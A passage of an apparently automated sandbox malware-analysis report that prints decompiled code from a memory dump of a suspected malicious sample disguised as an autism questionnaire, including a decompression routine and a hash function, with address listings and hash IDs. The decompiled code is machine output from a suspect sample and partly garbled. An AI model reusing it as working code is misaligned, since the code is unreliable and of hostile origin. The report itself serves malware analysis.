										_t435 = _t616 - _t617;
										__eflags = _t435 - _v72;
										if(_t435 >= _v72) {
											_t435 = _t435 + _v72;
											__eflags = _t435;
										}
										_v25 =  *((intOrPtr*)(_v68 + _t435));
										 *((char*)(_v68 + _t616)) = _v25;
										_t616 = _t616 + 1;
										__eflags = _t616 - _v72;
										if(_t616 == _v72) {
											_t616 = 0;
											__eflags = 0;
										}
										 *_v108 = _v25;
										_v24 = _v24 + 1;
										__eflags = _v64 - _v72;
										if(_v64 < _v72) {
											_v64 = _v64 + 1;
										}
										goto L24;
									}
									return 1;
								}
								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
								__eflags = _t474 - 7;
								if(__eflags < 0) {
									_v25 = E00425444(_t448,  &_v136, __eflags);
								} else {
									_v96 = _t616 - _t617;
									__eflags = _v96 - _v72;
									if(__eflags >= 0) {
										_t161 =  &_v96;
										 *_t161 = _v96 + _v72;
										__eflags =  *_t161;
									}
									_v89 =  *((intOrPtr*)(_v68 + _v96));
									_v25 = E00425470(_t448, _v89,  &_v136, __eflags);
								}
								 *_v108 = _v25;
								_v24 = _v24 + 1;
								_v108 = _v108 + 1;
								__eflags = _v64 - _v72;
								if(_v64 < _v72) {
									_t180 =  &_v64;
									 *_t180 = _v64 + 1;
									__eflags =  *_t180;
								}
								 *((char*)(_v68 + _t616)) = _v25;
								_t616 = _t616 + 1;
								__eflags = _t616 - _v72;
								if(_t616 == _v72) {
									_t616 = 0;
									__eflags = 0;
								}
								__eflags = _t474 - 4;
								if(_t474 >= 4) {
									__eflags = _t474 - 0xa;
									if(_t474 >= 0xa) {
										_t474 = _t474 - 6;
									} else {
										_t474 = _t474 - 3;
									}
								} else {
									_t474 = 0;
								}
								goto L93;
							}
							return 1;
						}
						return _v116;
					}
					L94:
					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
					 *(_v8 + 0x44) = _t474;
					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
					 *((char*)(_v8 + 0x4c)) = _v76;
					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
					 *_a4 = _v24;
					__eflags = 0;
					return 0;
				}
				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
				_v84 = 0;
				_v108 = _v20;
				__eflags = _v84 - _v80;
				if(_v84 >= _v80) {
					L7:
					_v52 = 1;
					_v48 = 1;
					_v44 = 1;
					_t617 = 1;
					_v60 = 0;
					_v64 = 0;
					_t474 = 0;
					_t616 = 0;
					 *((char*)(_v68 + _v72 - 1)) = 0;
					E00425294( &_v136);
					__eflags = _v116;
					if(_v116 != 0) {
						return _v116;
					}
					__eflags = _v112;
					if(_v112 == 0) {
						__eflags = 0;
						_v56 = 0;
						goto L12;
					} else {
						return 1;
					}
				} else {
					goto L6;
				}
				do {
					L6:
					 *_v108 = 0x400;
					_v84 = _v84 + 1;
					_v108 = _v108 + 2;
					__eflags = _v84 - _v80;
				} while (_v84 < _v80);
				goto L7;
			}
























































                                                                                              0x004255e8
                                                                                              0x004255eb
                                                                                              0x004255ee
                                                                                              0x004255f9
                                                                                              0x004255fc
                                                                                              0x0042560d
                                                                                              0x0042561e
                                                                                              0x00425626
                                                                                              0x0042562f
                                                                                              0x00425635
                                                                                              0x0042563b
                                                                                              0x00425644
                                                                                              0x0042564d
                                                                                              0x00425656
                                                                                              0x0042565f
                                                                                              0x00425668
                                                                                              0x00425671
                                                                                              0x0042567a
                                                                                              0x00425683
                                                                                              0x00425689
                                                                                              0x00425692
                                                                                              0x00425698
                                                                                              0x004256a1
                                                                                              0x004256af
                                                                                              0x004256b5
                                                                                              0x004256bb
                                                                                              0x00000000
                                                                                              0x004256bd
                                                                                              0x004256c4
                                                                                              0x004256c8
                                                                                              0x004256cd
                                                                                              0x004256d0
                                                                                              0x004256dd
                                                                                              0x004256dd
                                                                                              0x004256e0
                                                                                              0x004256e4
                                                                                              0x00425785
                                                                                              0x0042578e
                                                                                              0x004257c3
                                                                                              0x004257c3
                                                                                              0x004257c7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004257cc
                                                                                              0x004257cf
                                                                                              0x00425795
                                                                                              0x00425797
                                                                                              0x0042579a
                                                                                              0x0042579c
                                                                                              0x0042579c
                                                                                              0x0042579c
                                                                                              0x004257a9
                                                                                              0x004257aa
                                                                                              0x004257b0
                                                                                              0x004257b2
                                                                                              0x004257b5
                                                                                              0x004257b8
                                                                                              0x004257b9
                                                                                              0x004257bc
                                                                                              0x004257be
                                                                                              0x004257be
                                                                                              0x004257be
                                                                                              0x004257c0
                                                                                              0x004257c0
                                                                                              0x004257c0
                                                                                              0x00000000
                                                                                              0x004257c0
                                                                                              0x00000000
                                                                                              0x004257cf
                                                                                              0x004257d1
                                                                                              0x004257d3
                                                                                              0x004257eb
                                                                                              0x004257d5
                                                                                              0x004257df
                                                                                              0x004257df
                                                                                              0x004257f0
                                                                                              0x004257f2
                                                                                              0x004257f5
                                                                                              0x004257f8
                                                                                              0x004257f8
                                                                                              0x00425801
                                                                                              0x00425807
                                                                                              0x0042580a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425810
                                                                                              0x00425810
                                                                                              0x00425819
                                                                                              0x0042581c
                                                                                              0x00425820
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0042582a
                                                                                              0x0042582e
                                                                                              0x00425851
                                                                                              0x00425856
                                                                                              0x00425858
                                                                                              0x00425931
                                                                                              0x00425936
                                                                                              0x00425937
                                                                                              0x00425a77
                                                                                              0x00425a7d
                                                                                              0x00425a80
                                                                                              0x00425a83
                                                                                              0x00425a86
                                                                                              0x00425a8f
                                                                                              0x00425a88
                                                                                              0x00425a88
                                                                                              0x00425a88
                                                                                              0x00425a94
                                                                                              0x00425aac
                                                                                              0x00425aaf
                                                                                              0x00425ab5
                                                                                              0x00425ab9
                                                                                              0x00425ac0
                                                                                              0x00425abb
                                                                                              0x00425abb
                                                                                              0x00425abb
                                                                                              0x00425adc
                                                                                              0x00425adf
                                                                                              0x00425ae3
                                                                                              0x00425b5c
                                                                                              0x00425ae5
                                                                                              0x00425aeb
                                                                                              0x00425aee
                                                                                              0x00425afa
                                                                                              0x00425afc
                                                                                              0x00425b00
                                                                                              0x00425b36
                                                                                              0x00425b58
                                                                                              0x00425b02
                                                                                              0x00425b26
                                                                                              0x00425b26
                                                                                              0x00425b00
                                                                                              0x00425b5f
                                                                                              0x00425b5f
                                                                                              0x00425b60
                                                                                              0x00425b6b
                                                                                              0x00425b6b
                                                                                              0x00425b6f
                                                                                              0x00425b72
                                                                                              0x00425b84
                                                                                              0x00425b87
                                                                                              0x00425b94
                                                                                              0x00425b89
                                                                                              0x00425b8c
                                                                                              0x00425b8c
                                                                                              0x00425b97
                                                                                              0x00425b99
                                                                                              0x00425b9b
                                                                                              0x00425b9e
                                                                                              0x00425ba0
                                                                                              0x00425ba0
                                                                                              0x00425ba0
                                                                                              0x00425ba9
                                                                                              0x00425bb2
                                                                                              0x00425bb5
                                                                                              0x00425bb6
                                                                                              0x00425bb9
                                                                                              0x00425bbb
                                                                                              0x00425bbb
                                                                                              0x00425bbb
                                                                                              0x00425bbd
                                                                                              0x00425bc6
                                                                                              0x00425bc8
                                                                                              0x00425bcb
                                                                                              0x00425bce
                                                                                              0x00425bd2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425bd7
                                                                                              0x00425bda
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425bda
                                                                                              0x00425bdc
                                                                                              0x00425bdf
                                                                                              0x00425be2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425be2
                                                                                              0x00000000
                                                                                              0x00425b62
                                                                                              0x00425b62
                                                                                              0x00000000
                                                                                              0x00425b62
                                                                                              0x00425b60
                                                                                              0x0042594f
                                                                                              0x00425954
                                                                                              0x00425956
                                                                                              0x00425a06
                                                                                              0x00425a08
                                                                                              0x00425a26
                                                                                              0x00425a28
                                                                                              0x00425a2f
                                                                                              0x00425a35
                                                                                              0x00425a2a
                                                                                              0x00425a2a
                                                                                              0x00425a2a
                                                                                              0x00425a3b
                                                                                              0x00425a0a
                                                                                              0x00425a0a
                                                                                              0x00425a0a
                                                                                              0x00425a3e
                                                                                              0x00425a41
                                                                                              0x00425a43
                                                                                              0x00425a59
                                                                                              0x00425a5c
                                                                                              0x00425a5f
                                                                                              0x00425a68
                                                                                              0x00425a61
                                                                                              0x00425a61
                                                                                              0x00425a61
                                                                                              0x00425a6d
                                                                                              0x00000000
                                                                                              0x00425a6d
                                                                                              0x0042597d
                                                                                              0x0042597f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425985
                                                                                              0x00425989
                                                                                              0x00425995
                                                                                              0x00425998
                                                                                              0x004259a1
                                                                                              0x0042599a
                                                                                              0x0042599a
                                                                                              0x0042599a
                                                                                              0x004259a6
                                                                                              0x004259aa
                                                                                              0x004259ac
                                                                                              0x004259af
                                                                                              0x004259b1
                                                                                              0x004259b1
                                                                                              0x004259b1
                                                                                              0x004259ba
                                                                                              0x004259c3
                                                                                              0x004259c6
                                                                                              0x004259c7
                                                                                              0x004259ca
                                                                                              0x004259cc
                                                                                              0x004259cc
                                                                                              0x004259cc
                                                                                              0x004259d4
                                                                                              0x004259d6
                                                                                              0x004259dc
                                                                                              0x004259df
                                                                                              0x004259e5
                                                                                              0x004259e5
                                                                                              0x00000000
                                                                                              0x004259df
                                                                                              0x00000000
                                                                                              0x0042598b
                                                                                              0x00425888
                                                                                              0x0042588d
                                                                                              0x00425890
                                                                                              0x004258d1
                                                                                              0x00425892
                                                                                              0x00425896
                                                                                              0x0042589c
                                                                                              0x0042589f
                                                                                              0x004258a4
                                                                                              0x004258a4
                                                                                              0x004258a4
                                                                                              0x004258a4
                                                                                              0x004258b0
                                                                                              0x004258c1
                                                                                              0x004258c1
                                                                                              0x004258da
                                                                                              0x004258dc
                                                                                              0x004258df
                                                                                              0x004258e5
                                                                                              0x004258e8
                                                                                              0x004258ea
                                                                                              0x004258ea
                                                                                              0x004258ea
                                                                                              0x004258ea
                                                                                              0x004258f3
                                                                                              0x004258f6
                                                                                              0x004258f7
                                                                                              0x004258fa
                                                                                              0x004258fc
                                                                                              0x004258fc
                                                                                              0x004258fc
                                                                                              0x004258fe
                                                                                              0x00425901
                                                                                              0x0042590a
                                                                                              0x0042590d
                                                                                              0x00425917
                                                                                              0x0042590f
                                                                                              0x0042590f
                                                                                              0x0042590f
                                                                                              0x00425903
                                                                                              0x00425903
                                                                                              0x00425903
                                                                                              0x00000000
                                                                                              0x00425901
                                                                                              0x00000000
                                                                                              0x00425830
                                                                                              0x00000000
                                                                                              0x00425822
                                                                                              0x00425be8
                                                                                              0x00425bee
                                                                                              0x00425bf7
                                                                                              0x00425bfd
                                                                                              0x00425c09
                                                                                              0x00425c12
                                                                                              0x00425c18
                                                                                              0x00425c21
                                                                                              0x00425c2a
                                                                                              0x00425c33
                                                                                              0x00425c39
                                                                                              0x00425c42
                                                                                              0x00425c4b
                                                                                              0x00425c57
                                                                                              0x00425c60
                                                                                              0x00425c69
                                                                                              0x00425c6b
                                                                                              0x00000000
                                                                                              0x00425c6b
                                                                                              0x00425701
                                                                                              0x00425704
                                                                                              0x0042570c
                                                                                              0x00425712
                                                                                              0x00425715
                                                                                              0x0042572e
                                                                                              0x00425735
                                                                                              0x00425738
                                                                                              0x0042573b
                                                                                              0x0042573e
                                                                                              0x00425740
                                                                                              0x00425745
                                                                                              0x00425748
                                                                                              0x00425750
                                                                                              0x00425752
                                                                                              0x0042575d
                                                                                              0x00425762
                                                                                              0x00425766
                                                                                              0x00000000
                                                                                              0x00425768
                                                                                              0x00425770
                                                                                              0x00425774
                                                                                              0x00425780
                                                                                              0x00425782
                                                                                              0x00000000
                                                                                              0x00425776
                                                                                              0x00000000
                                                                                              0x00425776
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425717
                                                                                              0x00425717
                                                                                              0x0042571a
                                                                                              0x0042571f
                                                                                              0x00425722
                                                                                              0x00425729
                                                                                              0x00425729
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                              • Instruction ID: 61b87226b6134f121ca287378b5d435c32ef56f555bf4f4916e7d2b2d6d49e77
                                                                                              • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                              • Instruction Fuzzy Hash: E932E274E00629DFCB14CF99D981AEDBBB2BF88314F64816AD815AB341D734AE42CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004323DC, Relevance: .4, Instructions: 408COMMONCrypto
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004323DC(signed int* __eax, intOrPtr __ecx, signed int __edx) {
				signed int* _v8;
				signed int* _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				unsigned int* _t96;
				unsigned int* _t106;
				signed int* _t108;
				signed int _t109;

				_t109 = __edx;
				_v16 = __ecx;
				_v12 = __eax;
				_t106 =  &_v24;
				_t108 =  &_v28;
				_t96 =  &_v20;
				 *_t96 = __edx + 0xdeadbeef + _v16;
				 *_t106 =  *_t96;
				 *_t108 =  *_t96;
				_v8 = _v12;
				if((_v8 & 0x00000003) != 0) {
					if(__edx <= 0xc) {
						L20:
						if(_t109 > 0xc) {
							L23:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x18);
							L24:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x10);
							L25:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 8);
							L26:
							 *_t108 =  *_t108 + (_v8[2] & 0x000000ff);
							L27:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x18);
							L28:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x10);
							L29:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 8);
							L30:
							 *_t106 =  *_t106 + (_v8[1] & 0x000000ff);
							L31:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x18);
							L32:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x10);
							L33:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 8);
							L34:
							 *_t96 =  *_t96 + ( *_v8 & 0x000000ff);
							L35:
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x0000000e |  *_t106 >> 0x00000012);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x0000000b |  *_t108 >> 0x00000015);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x00000019 |  *_t96 >> 0x00000007);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000010 |  *_t106 >> 0x00000010);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x0000000e |  *_t96 >> 0x00000012);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000018 |  *_t106 >> 0x00000008);
							return  *_t108;
						}
						switch( *((intOrPtr*)(_t109 * 4 +  &M00432749))) {
							case 0:
								return  *_t108;
							case 1:
								goto L34;
							case 2:
								goto L33;
							case 3:
								goto L32;
							case 4:
								goto L31;
							case 5:
								goto L30;
							case 6:
								goto L29;
							case 7:
								goto L28;
							case 8:
								goto L27;
							case 9:
								goto L26;
							case 0xa:
								goto L25;
							case 0xb:
								goto L24;
							case 0xc:
								goto L23;
						}
					} else {
						goto L19;
					}
					do {
						L19:
						 *_t96 =  *_t96 + ( *_v8 & 0x000000ff) + ((_v8[0] & 0x000000ff) << 8) + ((_v8[0] & 0x000000ff) << 0x10) + ((_v8[0] & 0x000000ff) << 0x18);
						 *_t106 =  *_t106 + (_v8[1] & 0x000000ff) + ((_v8[1] & 0x000000ff) << 8) + ((_v8[1] & 0x000000ff) << 0x10) + ((_v8[1] & 0x000000ff) << 0x18);
						 *_t108 =  *_t108 + (_v8[2] & 0x000000ff) + ((_v8[2] & 0x000000ff) << 8) + ((_v8[2] & 0x000000ff) << 0x10) + ((_v8[2] & 0x000000ff) << 0x18);
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
						 *_t106 =  *_t106 +  *_t96;
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
						 *_t106 =  *_t106 +  *_t96;
						_t109 = _t109 - 0xc;
						_v8 =  &(_v8[3]);
					} while (_t109 > 0xc);
					goto L20;
				}
				if(__edx <= 0xc) {
					L3:
					if(_t109 > 0xc) {
						goto L35;
					}
					switch( *((intOrPtr*)(_t109 * 4 +  &M004324DD))) {
						case 0:
							return  *_t108;
						case 1:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x000000ff;
							 *__eax =  *__eax + ( *_v8 & 0x000000ff);
							goto L35;
						case 2:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x0000ffff;
							 *__eax =  *__eax + ( *_v8 & 0x0000ffff);
							goto L35;
						case 3:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x00ffffff;
							 *__eax =  *__eax + ( *_v8 & 0x00ffffff);
							goto L35;
						case 4:
							_v8 =  *_v8;
							 *__eax =  *__eax +  *_v8;
							goto L35;
						case 5:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 6:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 7:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 8:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 9:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xa:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xb:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xc:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							 *__ecx =  *__ecx + __edx;
							goto L35;
					}
				} else {
					goto L2;
				}
				do {
					L2:
					 *_t96 =  *_t96 +  *_v8;
					 *_t106 =  *_t106 + _v8[1];
					 *_t108 =  *_t108 + _v8[2];
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
					 *_t106 =  *_t106 +  *_t96;
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
					 *_t106 =  *_t106 +  *_t96;
					_t109 = _t109 - 0xc;
					_v8 = _v8 + 0xc;
				} while (_t109 > 0xc);
				goto L3;
			}













                                                                                              0x004323dc
                                                                                              0x004323e5
                                                                                              0x004323e8
                                                                                              0x004323eb
                                                                                              0x004323ee
                                                                                              0x004323f1
                                                                                              0x004323ff
                                                                                              0x00432403
                                                                                              0x00432407
                                                                                              0x0043240c
                                                                                              0x00432413
                                                                                              0x0043261d
                                                                                              0x0043273d
                                                                                              0x00432740
                                                                                              0x00432784
                                                                                              0x0043278e
                                                                                              0x00432790
                                                                                              0x0043279a
                                                                                              0x0043279c
                                                                                              0x004327a6
                                                                                              0x004327a8
                                                                                              0x004327af
                                                                                              0x004327b1
                                                                                              0x004327bb
                                                                                              0x004327bd
                                                                                              0x004327c7
                                                                                              0x004327c9
                                                                                              0x004327d3
                                                                                              0x004327d5
                                                                                              0x004327dc
                                                                                              0x004327de
                                                                                              0x004327e8
                                                                                              0x004327ea
                                                                                              0x004327f4
                                                                                              0x004327f6
                                                                                              0x00432800
                                                                                              0x00432802
                                                                                              0x00432808
                                                                                              0x0043280a
                                                                                              0x0043280c
                                                                                              0x0043281a
                                                                                              0x0043281e
                                                                                              0x0043282c
                                                                                              0x00432830
                                                                                              0x0043283e
                                                                                              0x00432842
                                                                                              0x00432850
                                                                                              0x00432854
                                                                                              0x00432862
                                                                                              0x00432866
                                                                                              0x00432874
                                                                                              0x00432878
                                                                                              0x00432886
                                                                                              0x00000000
                                                                                              0x00432888
                                                                                              0x00432742
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00432623
                                                                                              0x00432623
                                                                                              0x0043264d
                                                                                              0x0043267a
                                                                                              0x004326a7
                                                                                              0x004326ab
                                                                                              0x004326b9
                                                                                              0x004326bd
                                                                                              0x004326c1
                                                                                              0x004326cf
                                                                                              0x004326d3
                                                                                              0x004326d7
                                                                                              0x004326e5
                                                                                              0x004326e9
                                                                                              0x004326ed
                                                                                              0x004326fb
                                                                                              0x004326ff
                                                                                              0x00432703
                                                                                              0x00432711
                                                                                              0x00432715
                                                                                              0x00432719
                                                                                              0x00432727
                                                                                              0x0043272b
                                                                                              0x0043272d
                                                                                              0x00432730
                                                                                              0x00432734
                                                                                              0x00000000
                                                                                              0x00432623
                                                                                              0x0043241c
                                                                                              0x004324cd
                                                                                              0x004324d0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004324d6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0043251b
                                                                                              0x0043251d
                                                                                              0x00432523
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0043252d
                                                                                              0x0043252f
                                                                                              0x00432535
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0043253f
                                                                                              0x00432541
                                                                                              0x00432547
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00432551
                                                                                              0x00432553
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0043255a
                                                                                              0x0043255f
                                                                                              0x00432561
                                                                                              0x0043256a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00432571
                                                                                              0x00432576
                                                                                              0x00432578
                                                                                              0x00432581
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00432588
                                                                                              0x0043258d
                                                                                              0x0043258f
                                                                                              0x00432598
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0043259f
                                                                                              0x004325a4
                                                                                              0x004325a9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004325b0
                                                                                              0x004325b5
                                                                                              0x004325ba
                                                                                              0x004325bc
                                                                                              0x004325c5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004325cc
                                                                                              0x004325d1
                                                                                              0x004325d6
                                                                                              0x004325d8
                                                                                              0x004325e1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004325e8
                                                                                              0x004325ed
                                                                                              0x004325f2
                                                                                              0x004325f4
                                                                                              0x004325fd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00432604
                                                                                              0x00432609
                                                                                              0x0043260e
                                                                                              0x00432613
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00432422
                                                                                              0x00432422
                                                                                              0x00432427
                                                                                              0x0043242f
                                                                                              0x00432437
                                                                                              0x0043243b
                                                                                              0x00432449
                                                                                              0x0043244d
                                                                                              0x00432451
                                                                                              0x0043245f
                                                                                              0x00432463
                                                                                              0x00432467
                                                                                              0x00432475
                                                                                              0x00432479
                                                                                              0x0043247d
                                                                                              0x0043248b
                                                                                              0x0043248f
                                                                                              0x00432493
                                                                                              0x004324a1
                                                                                              0x004324a5
                                                                                              0x004324a9
                                                                                              0x004324b7
                                                                                              0x004324bb
                                                                                              0x004324bd
                                                                                              0x004324c0
                                                                                              0x004324c4
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
